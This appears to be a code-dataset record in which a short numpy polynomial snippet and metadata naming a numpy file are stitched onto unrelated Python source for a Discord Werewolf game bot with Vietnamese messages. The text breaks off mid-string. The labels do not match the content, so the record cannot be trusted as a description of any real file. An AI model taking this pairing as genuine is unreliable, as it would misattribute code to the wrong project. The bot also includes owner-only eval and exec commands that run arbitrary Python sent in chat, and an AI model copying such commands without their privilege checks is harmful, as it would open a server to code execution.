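    # poly1d wraps a coefficient array with call and arithmetic support.
    p = poly1d([2.0, -1.0, 1.0])
    assert NX.allclose(p(1.0), 2.0)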
AustereCuriosity/numpy
numpy/lib/polynomial.py
Python
bsd-3-clause
37,980
[ "Gaussian" ]
822aaa1cbbda9d8c530778bd25b5818a7bab547209d954a48137371cabf8abed
import discord import asyncio import aiohttp import os import random import traceback import sys from datetime import datetime, timedelta from io import BytesIO, StringIO from config import * from settings import * import json import urllib.request ################## START INIT ##################### client = discord.Client() # [playing?, {players dict}, day?, [night start, day start], [night elapsed, day elapsed], first join, gamemode, {original roles amount}] session = [False, {}, False, [0, 0], [timedelta(0), timedelta(0)], 0, '', {}] PLAYERS_ROLE = None ADMINS_ROLE = None WEREWOLF_NOTIFY_ROLE = None ratelimit_dict = {} pingif_dict = {} notify_me = [] stasis = {} commands = {} faftergame = None starttime = datetime.now() with open(NOTIFY_FILE, 'a+') as notify_file: notify_file.seek(0) notify_me = notify_file.read().split(',') if os.path.isfile(STASIS_FILE): with open(STASIS_FILE, 'r') as stasis_file: stasis = json.load(stasis_file) else: with open(STASIS_FILE, 'a+') as stasis_file: stasis_file.write('{}') random.seed(datetime.now()) def get_jsonparsed_data(url): try: response = urllib.request.urlopen(url) except urllib.error.HTTPError: return None, None # url does not exist data = response.read().decode("utf-8") return json.loads(data), data def load_language(language): file = 'lang/{}.json'.format(language) if not os.path.isfile(file): file = 'lang/en.json' print("Could not find language file {}.json, fallback on en.json".format(language)) with open(file, 'r', encoding='utf-8') as f: return json.load(f) lang = load_language(MESSAGE_LANGUAGE) def cmd(name, perms, description, *aliases): def real_decorator(func): commands[name] = [func, perms, description.format(BOT_PREFIX)] for alias in aliases: if alias not in commands: commands[alias] = [func, perms, "```\nAlias for {0}{1}.```".format(BOT_PREFIX, name)] else: print("ERROR: Cannot assign alias {0} to command {1} since it is already the name of a command!".format(alias, name)) return func return real_decorator ################### END INIT ###################### @client.event async def on_ready(): print('Logged in as') print(client.user.name) print(client.user.id) print('------') await log(1, 'on_ready triggered!') # [playing : True | False, players : {player id : [alive, role, action, template, other]}, day?, [datetime night, datetime day], [elapsed night, elapsed day], first join time, gamemode] for role in client.get_server(WEREWOLF_SERVER).role_hierarchy: if role.name == PLAYERS_ROLE_NAME: global PLAYERS_ROLE PLAYERS_ROLE = role if role.name == ADMINS_ROLE_NAME: global ADMINS_ROLE ADMINS_ROLE = role if role.name == WEREWOLF_NOTIFY_ROLE_NAME: global WEREWOLF_NOTIFY_ROLE WEREWOLF_NOTIFY_ROLE = role if PLAYERS_ROLE: await log(0, "Players role id: " + PLAYERS_ROLE.id) else: await log(3, "Could not find players role " + PLAYERS_ROLE_NAME) if ADMINS_ROLE: await log(0, "Admins role id: " + ADMINS_ROLE.id) else: await log(3, "Could not find admins role " + ADMINS_ROLE_NAME) if WEREWOLF_NOTIFY_ROLE: await log(0, "Werewolf Notify role id: " + WEREWOLF_NOTIFY_ROLE.id) else: await log(2, "Could not find Werewolf Notify role " + WEREWOLF_NOTIFY_ROLE_NAME) if PLAYING_MESSAGE: await client.change_presence(status=discord.Status.online, game=discord.Game(name=PLAYING_MESSAGE)) @client.event async def on_resume(): print("RESUMED") await log(1, "on_resume triggered!") @client.event async def on_message(message): if message.author.id in [client.user.id] + IGNORE_LIST or not client.get_server(WEREWOLF_SERVER).get_member(message.author.id): if not 
(message.author.id in ADMINS or message.author.id == OWNER_ID): return if await rate_limit(message): return if message.channel.is_private: await log(0, 'pm from ' + message.author.name + ' (' + message.author.id + '): ' + message.content) if session[0] and message.author.id in session[1]: if session[1][message.author.id][1] in WOLFCHAT_ROLES and session[1][message.author.id][0]: if not message.content.strip().startswith(BOT_PREFIX): await wolfchat(message) if message.content.strip().startswith(BOT_PREFIX): # command command = message.content.strip()[len(BOT_PREFIX):].lower().split(' ')[0] parameters = ' '.join(message.content.strip().lower().split(' ')[1:]) if has_privileges(1, message) or message.channel.id == GAME_CHANNEL or message.channel.is_private: await parse_command(command, message, parameters) elif message.channel.is_private: command = message.content.strip().lower().split(' ')[0] parameters = ' '.join(message.content.strip().lower().split(' ')[1:]) await parse_command(command, message, parameters) ############# COMMANDS ############# @cmd('shutdown', [2, 2], "```\n{0}shutdown takes no arguments\n\nShuts down the bot. Owner-only.```") async def cmd_shutdown(message, parameters): if parameters.startswith("-fstop"): await cmd_fstop(message, "-force") elif parameters.startswith("-stop"): await cmd_fstop(message, parameters[len("-stop"):]) elif parameters.startswith("-fleave"): await cmd_fleave(message, 'all') await reply(message, "Shutting down...") await client.logout() @cmd('ping', [0, 0], "```\n{0}ping takes no arguments\n\nTests the bot\'s responsiveness.```") async def cmd_ping(message, parameters): msg = random.choice(lang['ping']).format( bot_nick=client.user.display_name, author=message.author.name, p=BOT_PREFIX) await reply(message, msg) @cmd('eval', [2, 2], "```\n{0}eval <evaluation string>\n\nEvaluates <evaluation string> using Python\'s eval() function and returns a result. Owner-only.```") async def cmd_eval(message, parameters): output = None parameters = ' '.join(message.content.split(' ')[1:]) if parameters == '': await reply(message, commands['eval'][2].format(BOT_PREFIX)) return try: output = eval(parameters) except: await reply(message, '```\n' + str(traceback.format_exc()) + '\n```') traceback.print_exc() return if asyncio.iscoroutine(output): output = await output await reply(message, '```py\n' + str(output) + '\n```') @cmd('exec', [2, 2], "```\n{0}exec <exec string>\n\nExecutes <exec string> using Python\'s exec() function. 
Owner-only.```")
async def cmd_exec(message, parameters):
    parameters = ' '.join(message.content.split(' ')[1:])
    if parameters == '':
        await reply(message, commands['exec'][2].format(BOT_PREFIX))
        return
    old_stdout = sys.stdout
    redirected_output = sys.stdout = StringIO()
    try:
        exec(parameters)
    except Exception:
        await reply(message, '```py\n{}\n```'.format(traceback.format_exc()))
        return
    finally:
        sys.stdout = old_stdout
    output = str(redirected_output.getvalue())
    if output == '':
        output = ":thumbsup:"
    await client.send_message(message.channel, output)

@cmd('async', [2, 2], "```\n{0}async <code>\n\nExecutes <code> as a coroutine.```")
async def cmd_async(message, parameters, recursion=0):
    if parameters == '':
        await reply(message, commands['async'][2].format(BOT_PREFIX))
        return
    env = {'message' : message,
           'parameters' : parameters,
           'recursion' : recursion,
           'client' : client,
           'channel' : message.channel,
           'author' : message.author,
           'server' : message.server}
    env.update(globals())
    old_stdout = sys.stdout
    redirected_output = sys.stdout = StringIO()
    result = None
    exec_string = "async def _temp_exec():\n"
    exec_string += '\n'.join(' ' * 4 + line for line in parameters.split('\n'))
    try:
        exec(exec_string, env)
    except Exception:
        traceback.print_exc()
        result = traceback.format_exc()
    else:
        _temp_exec = env['_temp_exec']
        try:
            returnval = await _temp_exec()
            value = redirected_output.getvalue()
            if returnval is None:
                result = value
            else:
                result = value + '\n' + str(returnval)
        except Exception:
            traceback.print_exc()
            result = traceback.format_exc()
    finally:
        sys.stdout = old_stdout
    await client.send_message(message.channel, "```py\n{}\n```".format(result))

@cmd('help', [0, 0], "```\n{0}help <command>\n\nGives information about <command>. Try {0}list for a listing of commands.```")
async def cmd_help(message, parameters):
    if parameters == '':
        parameters = 'help'
    if parameters in commands:
        await reply(message, commands[parameters][2].format(BOT_PREFIX))
    else:
        await reply(message, 'No help found for command ' + parameters)

@cmd('list', [0, 0], "```\n{0}list takes no arguments\n\nDisplays a listing of commands. Try {0}help <command> for details on a command.```")
async def cmd_list(message, parameters):
    cmdlist = []
    for key in commands:
        if message.channel.is_private:
            if has_privileges(commands[key][1][1], message):
                cmdlist.append(key)
        else:
            if has_privileges(commands[key][1][0], message):
                cmdlist.append(key)
    await reply(message, "Available commands: {}".format(", ".join(sorted(cmdlist))))

@cmd('join', [0, 1], "```\n{0}join [<gamemode>]\n\nJoins the game if it has not started yet. Votes for [<gamemode>] if one is given.```", 'j')
async def cmd_join(message, parameters):
    if session[0]:
        return
    if message.author.id in stasis and stasis[message.author.id] > 0:
        await reply(message, "You are in stasis for **{}** game{}. 
Please do not break rules, idle out or use !leave during a game.".format( stasis[message.author.id], '' if stasis[message.author.id] == 1 else 's')) return if len(session[1]) >= MAX_PLAYERS: await reply(message, random.choice(lang['maxplayers']).format(MAX_PLAYERS)) return if message.author.id in session[1]: await reply(message, random.choice(lang['alreadyin']).format(message.author.name)) else: session[1][message.author.id] = [True, '', '', [], []] if len(session[1]) == 1: client.loop.create_task(game_start_timeout_loop()) await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.idle) await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['gamestart']).format( message.author.name, p=BOT_PREFIX)) else: await client.send_message(message.channel, "**{}** tham gia và tăng số người chơi lên **{}**.".format( message.author.name, len(session[1]))) if parameters: await cmd_vote(message, parameters) # alive, role, action, [templates], [other] await client.add_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) await player_idle(message) @cmd('leave', [0, 1], "```\n{0}leave không cần thêm cú pháp\n\nRời game đang chơi. Nếu thực sự cần rời thì hãy rời trước khi game bắt đầu chơi.```", 'q') async def cmd_leave(message, parameters): if session[0] and message.author.id in list(session[1]) and session[1][message.author.id][0]: session[1][message.author.id][0] = False await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['leavedeath']).format(message.author.name, get_role(message.author.id, 'death'))) await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) if message.author.id in stasis: stasis[message.author.id] += QUIT_GAME_STASIS else: stasis[message.author.id] = QUIT_GAME_STASIS if session[0] and win_condition() == None: await check_traitor() await log(1, "{} ({}) QUIT DURING GAME".format(message.author.display_name, message.author.id)) else: if message.author.id in session[1]: if session[0]: await reply(message, "wot?") return del session[1][message.author.id] await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['leavelobby']).format(message.author.name, len(session[1]))) if len(session[1]) == 0: await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) else: await reply(message, random.choice(lang['notplayingleave'])) @cmd('fjoin', [1, 1], "```\n{0}fjoin <mentions of users>\n\nForces each <mention> to join the game.```") async def cmd_fjoin(message, parameters): if session[0]: return if parameters == '': await reply(message, commands['fjoin'][2].format(BOT_PREFIX)) return raw_members = parameters.split(' ') join_list = [] for member in raw_members: if member.strip('<!@>').isdigit(): join_list.append(member.strip('<!@>')) elif '-' in member: left = member.split('-')[0] right = member.split('-')[1] if left.isdigit() and right.isdigit(): join_list += list(map(str, range(int(left), int(right) + 1))) if join_list == []: await reply(message, "ERROR: no valid mentions found") return join_msg = "" for member in sort_players(join_list): session[1][member] = [True, '', '', [], []] join_msg += "**" + get_name(member) + "** was forced to join the game.\n" if client.get_server(WEREWOLF_SERVER).get_member(member): await 
client.add_roles(client.get_server(WEREWOLF_SERVER).get_member(member), PLAYERS_ROLE) join_msg += "New player count: **{}**".format(len(session[1])) if len(session[1]) > 0: await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.idle) await client.send_message(message.channel, join_msg) await log(2, "{0} ({1}) used FJOIN {2}".format(message.author.name, message.author.id, parameters)) @cmd('fleave', [1, 1], "```\n{0}fleave <mentions of users | all>\n\nForces each <mention> to leave the game. If the parameter is all, removes all players from the game.```") async def cmd_fleave(message, parameters): if parameters == '': await reply(message, commands['fleave'][2].format(BOT_PREFIX)) return raw_members = parameters.split(' ') leave_list = [] if parameters == 'all': leave_list = list(session[1]) else: for member in raw_members: if member.strip('<!@>').isdigit(): leave_list.append(member.strip('<!@>')) elif '-' in member: left = member.split('-')[0] right = member.split('-')[1] if left.isdigit() and right.isdigit(): leave_list += list(map(str, range(int(left), int(right) + 1))) if leave_list == []: await reply(message, "ERROR: no valid mentions found") return leave_msg = "" for member in sort_players(leave_list): if member in list(session[1]): if session[0]: session[1][member][0] = False leave_msg += "**" + get_name(member) + "** bị đẩy vào ngọn lửa, không khí thơm mùi mỡ khét của **" + get_role(member, 'death') + "**.\n" else: del session[1][member] leave_msg += "**" + get_name(member) + "** bị bắt phải rời trò chơi.\n" if client.get_server(WEREWOLF_SERVER).get_member(member): await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(member), PLAYERS_ROLE) if not session[0]: leave_msg += "New player count: **{}**".format(len(session[1])) if len(session[1]) == 0: await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) await client.send_message(client.get_channel(GAME_CHANNEL), leave_msg) await log(2, "{0} ({1}) used FLEAVE {2}".format(message.author.name, message.author.id, parameters)) if session[0] and win_condition() == None: await check_traitor() @cmd('refresh', [1, 1], "```\n{0}refresh [<language file>]\n\nRefreshes the current language's language file from GitHub. Admin only.```") async def cmd_refresh(message, parameters): global lang if parameters == '': parameters = MESSAGE_LANGUAGE url = "https://raw.githubusercontent.com/belguawhale/Discord-Werewolf/master/lang/{}.json".format(parameters) codeset = parameters temp_lang, temp_str = get_jsonparsed_data(url) if not temp_lang: await reply(message, "Could not refresh language {} from Github.".format(parameters)) return with open('lang/{}.json'.format(parameters), 'w', encoding='utf-8') as f: f.write(temp_str) lang = temp_lang await reply(message, 'The messages with language code `' + codeset + '` have been refreshed from GitHub.') @cmd('start', [0, 1], "```\n{0}start không cần thêm cú pháp\n\nBầu chọn bắt đầu game. 
Một game cần ít nhất " +\ str(MIN_PLAYERS) + " người chơi để bắt đầu.```") async def cmd_start(message, parameters): if session[0]: return if message.author.id not in session[1]: await reply(message, random.choice(lang['notplayingstart'])) return if len(session[1]) < MIN_PLAYERS: await reply(message, random.choice(lang['minplayers']).format(MIN_PLAYERS)) return if session[1][message.author.id][1]: return session[1][message.author.id][1] = 'start' votes = len([x for x in session[1] if session[1][x][1] == 'start']) votes_needed = max(2, min(len(session[1]) // 4 + 1, 4)) if votes < votes_needed: await client.send_message(client.get_channel(GAME_CHANNEL), "**{}** Đang muốn bắt đầu trò chơi. **{}** votes nữa để bắt đầu{}.".format( message.author.display_name, votes_needed - votes, '' if (votes_needed - votes == 1) else 's')) else: await run_game() if votes == 1: await start_votes(message.author.id) @cmd('fstart', [1, 2], "```\n{0}fstart takes no arguments\n\nForces game to start.```") async def cmd_fstart(message, parameters): if session[0]: return if len(session[1]) < MIN_PLAYERS: await reply(message, random.choice(lang['minplayers']).format(MIN_PLAYERS)) else: await client.send_message(client.get_channel(GAME_CHANNEL), "**" + message.author.name + "** forced the game to start.") await log(2, "{0} ({1}) FSTART".format(message.author.name, message.author.id)) await run_game() @cmd('fstop', [1, 1], "```\n{0}fstop [<-force|reason>]\n\nForcibly stops the current game with an optional [<reason>]. Use {0}fstop -force if " "bot errors.```") async def cmd_fstop(message, parameters): msg = "Game forcibly stopped by **" + message.author.name + "**" if parameters == "": msg += "." elif parameters == "-force": if not session[0]: return msg += ". Here is some debugging info:\n```py\n{0}\n```".format(str(session)) session[0] = False perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) for player in list(session[1]): del session[1][player] member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) session[3] = [0, 0] session[4] = [timedelta(0), timedelta(0)] session[6] = '' session[7] = {} await client.send_message(client.get_channel(GAME_CHANNEL), msg) return else: msg += " for reason: `" + parameters + "`." 
if not session[0]: await reply(message, "There is no currently running game!") return else: await log(2, "{0} ({1}) FSTOP {2}".format(message.author.name, message.author.id, parameters)) await end_game(msg + '\n\n' + end_game_stats()) @cmd('sync', [1, 1], "```\n{0}sync takes no arguments\n\nSynchronizes all player roles and channel permissions with session.```") async def cmd_sync(message, parameters): for member in client.get_server(WEREWOLF_SERVER).members: if member.id in session[1] and session[1][member.id][0]: if not PLAYERS_ROLE in member.roles: await client.add_roles(member, PLAYERS_ROLE) else: if PLAYERS_ROLE in member.roles: await client.remove_roles(member, PLAYERS_ROLE) perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) if session[0]: perms.send_messages = False else: perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) await log(2, "{0} ({1}) SYNC".format(message.author.name, message.author.id)) await reply(message, "Sync successful.") @cmd('op', [1, 1], "```\n{0}op takes no arguments\n\nOps yourself if you are an admin```") async def cmd_op(message, parameters): await log(2, "{0} ({1}) OP {2}".format(message.author.name, message.author.id, parameters)) if parameters == "": await client.add_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), ADMINS_ROLE) await reply(message, ":thumbsup:") else: member = client.get_server(WEREWOLF_SERVER).get_member(parameters.strip("<!@>")) if member: if member.id in ADMINS: await client.add_roles(member, ADMINS_ROLE) await reply(message, ":thumbsup:") @cmd('deop', [1, 1], "```\n{0}deop takes no arguments\n\nDeops yourself so you can play with the players ;)```") async def cmd_deop(message, parameters): await log(2, "{0} ({1}) DEOP {2}".format(message.author.name, message.author.id, parameters)) if parameters == "": await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), ADMINS_ROLE) await reply(message, ":thumbsup:") else: member = client.get_server(WEREWOLF_SERVER).get_member(parameters.strip("<!@>")) if member: if member.id in ADMINS: await client.remove_roles(member, ADMINS_ROLE) await reply(message, ":thumbsup:") @cmd('role', [0, 0], "```\n{0}role [<role | number of players | gamemode>] [<number of players>]\n\nNếu đưa ra tên một <role>, " "cho biết thông tin về <role> đó. Nếu cho số lượng người chơi <number of players>, Cho biết số lượng mỗi thành phần " "role for the specified <number of players> for the specified <gamemode>, defaulting to default. If " "only a <gamemode> is given, displays a role guide for <gamemode>. 
" "Nếu để trống, cho danh sách các vai.```", 'roles') async def cmd_role(message, parameters): if parameters == "" and not session[0] or parameters == 'list': await reply(message, "Roles: " + ", ".join(sort_roles(roles))) return elif parameters == "" and session[0]: msg = "**{}** người chơi đang chơi **{}** gamemode:```\n".format(len(session[1]), 'roles' if session[6].startswith('roles') else session[6]) if session[6] in ('random',): msg += "!role đã bị tắt cho {} gamemode.\n```".format(session[6]) await reply(message, msg) return game_roles = dict(session[7]) msg += '\n'.join(["{}: {}".format(x, game_roles[x]) for x in sort_roles(game_roles)]) msg += '```' await reply(message, msg) return elif _autocomplete(parameters, roles)[1] == 1: role = _autocomplete(parameters, roles)[0] await reply(message, "```\nTên vai: {}\nPhe: {}\nMiêu tả: {}\n```".format(role, roles[role][0], roles[role][2])) return params = parameters.split(' ') gamemode = 'default' num_players = -1 choice, num = _autocomplete(params[0], gamemodes) if num == 1: gamemode = choice if params[0].isdigit(): num_players = params[0] elif len(params) == 2 and params[1].isdigit(): num_players = params[1] if num_players == -1: if len(params) == 2: if params[1] == 'table': # generate role table WIDTH = 20 role_dict = gamemodes[gamemode]['roles'] role_guide = "Bảng role cho chế độ **{}**:\n".format(gamemode) role_guide += "```\n" + " " * (WIDTH + 2) role_guide += ','.join("{}{}".format(' ' * (2 - len(str(x))), x) for x in range(gamemodes[gamemode]['min_players'], gamemodes[gamemode]['max_players'] + 1)) + '\n' role_guide += '\n'.join(role + ' ' * (WIDTH - len(role)) + ": " + repr(\ role_dict[role][gamemodes[gamemode]['min_players'] - MIN_PLAYERS:gamemodes[gamemode]['max_players']]) for role in sort_roles(role_dict)) role_guide += "\n```" elif params[1] == 'guide': # generate role guide role_dict = gamemodes[gamemode]['roles'] prev_dict = dict((x, 0) for x in roles if x != 'villager') role_guide = 'Các role trong gamemode **{}**:\n'.format(gamemode) for i in range(gamemodes[gamemode]['max_players'] - MIN_PLAYERS + 1): current_dict = {} for role in sort_roles(roles): if role == 'villager': continue if role in role_dict: current_dict[role] = role_dict[role][i] else: current_dict[role] = 0 # compare previous and current if current_dict == prev_dict: # same continue role_guide += '**[{}]** '.format(i + MIN_PLAYERS) for role in sort_roles(roles): if role == 'villager': continue if current_dict[role] == 0 and prev_dict[role] == 0: # role not in gamemode continue if current_dict[role] > prev_dict[role]: # role increased role_guide += role if current_dict[role] > 1: role_guide += " ({})".format(current_dict[role]) role_guide += ', ' elif prev_dict[role] > current_dict[role]: role_guide += '~~{}'.format(role) if prev_dict[role] > 1: role_guide += " ({})".format(prev_dict[role]) role_guide += '~~, ' role_guide = role_guide.rstrip(', ') + '\n' # makes a copy prev_dict = dict(current_dict) else: role_guide = "Hãy chọn 1 trong 2 phụ lệnh: " + ', '.join(['guide', 'table']) else: role_guide = "Please choose one of the following for the third parameter: {}".format(', '.join(['guide', 'table'])) await reply(message, role_guide) else: num_players = int(num_players) if num_players in range(gamemodes[gamemode]['min_players'], gamemodes[gamemode]['max_players'] + 1): if gamemode in ('random',): msg = "!role đã bị tắt trong **{}** gamemode.".format(gamemode) else: msg = "Vai của **{}** người chơi trong chế độ **{}**:```\n".format(num_players, gamemode) 
game_roles = get_roles(gamemode, num_players) msg += '\n'.join("{}: {}".format(x, game_roles[x]) for x in sort_roles(game_roles)) msg += '```' await reply(message, msg) else: await reply(message, "Hãy chọn số người chơi trong khoảng " + str(gamemodes[gamemode]['min_players']) +\ " and " + str(gamemodes[gamemode]['max_players']) + ".") async def _send_role_info(player, sendrole=True): if session[0] and player in session[1]: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member and session[1][player][0]: role = get_role(player, 'role') templates = get_role(player, 'templates') if member and session[1][player][0]: try: if sendrole: await client.send_message(member, "Vai của bạn là **" + role + "**. " + roles[role][2] + '\n') living_players = [x for x in session[1] if session[1][x][0]] living_players_string = ', '.join('**{}** ({})'.format(get_name(x), x) for x in living_players) msg = '' if roles[role][0] == 'wolf' and role != 'cultist': living_players_string = '' for plr in living_players: temprole = get_role(plr, 'role') temptemplates = get_role(plr, 'templates') role_string = '' if 'cursed' in temptemplates: role_string += 'cursed ' if roles[temprole][0] == 'wolf' and temprole != 'cultist': role_string += temprole living_players_string += "**{}** ({})".format(get_name(plr), plr) if role_string: living_players_string += " (**{}**)".format(role_string.rstrip(' ')) living_players_string += ', ' living_players_string = living_players_string.rstrip(', ') elif role == 'shaman': if session[1][player][2] in totems: totem = session[1][player][2] msg += "Bạn có bùa **{0}**. {1}".format(totem.replace('_', ' '), totems[totem]) + '\n' if role in ['wolf', 'werecrow', 'werekitten', 'traitor', 'sorcerer', 'harlot', 'seer', 'shaman', 'hunter', 'detective', 'crazed shaman']: msg += "Living players: " + living_players_string + '\n\n' if 'gunner' in templates: msg += "Bạn có 1 khẩu súng lục và **{}** viên đạn{}. Xài lệnh `{}role gunner` để biết chi tiết.".format( session[1][player][4].count('bullet'), '' if session[1][player][4].count('bullet') == 1 else 's', BOT_PREFIX) if msg != '': await client.send_message(member, msg) except discord.Forbidden: await client.send_message(client.get_channel(GAME_CHANNEL), member.mention + ", bạn không thể chơi game nếu bạn chặn tôi :<") @cmd('myrole', [0, 0], "```\n{0}myrole không cần thêm cú pháp\n\nCho bạn biết vai mình trong tin nhắn riêng.```") async def cmd_myrole(message, parameters): await _send_role_info(message.author.id) @cmd('stats', [0, 0], "```\n{0}stats không cần thêm cú pháp\n\nXem trạng thái game.```") async def cmd_stats(message, parameters): if session[0]: reply_msg = "Bây giờ là **" + ("day" if session[2] else "night") + "time**. 
Đang sử dụng **{}** gamemode.".format(
            'roles' if session[6].startswith('roles') else session[6])
        reply_msg += "\n**" + str(len(session[1])) + "** Người chơi đang chơi: **" + str(len([x for x in session[1] if session[1][x][0]])) + "** còn sống, "
        reply_msg += "**" + str(len([x for x in session[1] if not session[1][x][0]])) + "** đã chết\n"
        reply_msg += "```basic\nCòn sống:\n" + "\n".join(get_name(x) + ' (' + x + ')' for x in sort_players(session[1]) if session[1][x][0]) + '\n'
        reply_msg += "Đã chết:\n" + "\n".join(get_name(x) + ' (' + x + ')' for x in sort_players(session[1]) if not session[1][x][0]) + '\n'
        if session[6] in ('random',):
            reply_msg += '\n!stats ko thể dùng trong {} gamemode.```'.format(session[6])
            await reply(message, reply_msg)
            return
        orig_roles = dict(session[7])  # make a copy
        role_dict = {}
        traitorvill = 0
        traitor_turned = False
        for other in [session[1][x][4] for x in session[1]]:
            if 'traitor' in other:
                traitor_turned = True
                break
        for role in roles:  # Fixes !stats crashing with !frole of roles not in game
            role_dict[role] = [0, 0]  # [min, max] for traitor and similar roles
        for player in session[1]:
            # Get maximum numbers for all roles
            role_dict[get_role(player, 'role')][0] += 1
            role_dict[get_role(player, 'role')][1] += 1
            if get_role(player, 'role') in ['villager', 'traitor']:
                traitorvill += 1
        #reply_msg += "Total roles: " + ", ".join(sorted([x + ": " + str(roles[x][3][len(session[1]) - MIN_PLAYERS]) for x in roles if roles[x][3][len(session[1]) - MIN_PLAYERS] > 0])).rstrip(", ") + '\n'
        # ^ saved this beast for posterity
        reply_msg += "Roles tổng cộng: "
        total_roles = dict(orig_roles)
        reply_msg += ', '.join("{}: {}".format(x, total_roles[x]) for x in sort_roles(total_roles))
        for role in list(role_dict):  # list is used to make a copy
            if role in TEMPLATES_ORDERED:
                del role_dict[role]
        if traitor_turned:
            role_dict['wolf'][0] += role_dict['traitor'][0]
            role_dict['wolf'][1] += role_dict['traitor'][1]
            role_dict['traitor'] = [0, 0]
        for player in session[1]:
            # Subtract dead players
            if not session[1][player][0]:
                role = get_role(player, 'role')
                reveal = get_role(player, 'deathstats')
                if role == 'traitor' and traitor_turned:
                    # player died as traitor but traitor turn message played, so subtract from wolves
                    reveal = 'wolf'
                if reveal == 'villager':
                    traitorvill -= 1
                    # could be traitor or villager
                    if 'traitor' in role_dict:
                        role_dict['traitor'][0] = max(0, role_dict['traitor'][0] - 1)
                        if role_dict['traitor'][1] > traitorvill:
                            role_dict['traitor'][1] = traitorvill
                    role_dict['villager'][0] = max(0, role_dict['villager'][0] - 1)
                    if role_dict['villager'][1] > traitorvill:
                        role_dict['villager'][1] = traitorvill
                else:
                    # player died is definitely that role
                    role_dict[reveal][0] = max(0, role_dict[reveal][0] - 1)
                    role_dict[reveal][1] = max(0, role_dict[reveal][1] - 1)
        reply_msg += "\nRoles hiện tại: "
        for template in TEMPLATES_ORDERED:
            if template in orig_roles:
                del orig_roles[template]
        for role in sort_roles(orig_roles):
            # Show the exact live count when it is known, otherwise the
            # possible [min, max] range (e.g. when traitor/villager deaths
            # are ambiguous).
            if role_dict[role][0] == role_dict[role][1]:
                reply_msg += "{}: {}".format(role, role_dict[role][0])
            else:
                reply_msg += "{}: {}-{}".format(role, role_dict[role][0], role_dict[role][1])
            reply_msg += ", "
        reply_msg = reply_msg.rstrip(", ") + "```"
        await reply(message, reply_msg)
    else:
        players = ["{} ({})".format(get_name(x), x) for x in sort_players(session[1])]
        num_players = len(session[1])
        if num_players == 0:
            await client.send_message(message.channel, "Chưa có game nào đang diễn ra. 
Thử xài {}join để bắt đầu 1 game mới!".format(BOT_PREFIX)) else: await client.send_message(message.channel, "{} người chơi trong sảnh: ```\n{}\n```".format(num_players, '\n'.join(players))) @cmd('revealroles', [1, 1], "```\n{0}revealroles takes no arguments\n\nDisplays what each user's roles are and sends it in pm.```", 'rr') async def cmd_revealroles(message, parameters): msg = "**Gamemode**: {}```diff\n".format(session[6]) for player in sort_players(session[1]): msg += "{} ".format('+' if session[1][player][0] else '-') + get_name(player) + ' (' + player + '): ' + get_role(player, 'actual') msg += "; action: " + session[1][player][2] + "; other: " + ' '.join(session[1][player][4]) + "\n" msg += "```" await client.send_message(message.channel, msg) await log(2, "{0} ({1}) REVEALROLES".format(message.author.name, message.author.id)) @cmd('see', [2, 0], "```\n{0}see <player>\n\nNếu là tiên tri, dùng lệnh để xem vai của <player>.```") async def cmd_see(message, parameters): if not session[0] or message.author.id not in session[1] or not session[1][message.author.id][0]: return if not get_role(message.author.id, 'role') in COMMANDS_FOR_ROLE['see']: return if session[2]: await reply(message, "Chỉ có thể soi vào ban đêm.") return if session[1][message.author.id][2]: await reply(message, "Bạn đã dùng năng lực rồi.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Mi tự biết mi là ai rồi ha :>.") elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][2] = player seen_role = get_role(player, 'seen') if (session[1][player][4].count('deceit_totem2') +\ session[1][message.author.id][4].count('deceit_totem2')) % 2 == 1: if seen_role == 'wolf': seen_role = 'villager' else: seen_role = 'wolf' await reply(message, "Bạn thấy 1 điềm báo... trong điềm báo bạn thấy **" + get_name(player) + "** là một **" + seen_role + "**!") await log(1, "{0} ({1}) SEE {2} ({3}) AS {4}".format(get_name(message.author.id), message.author.id, get_name(player), player, seen_role)) else: await reply(message, "Không tìm thấy " + parameters) @cmd('kill', [2, 0], "```\n{0}kill <player>\n\nNếu là sói, bầu chọn giết <player>. 
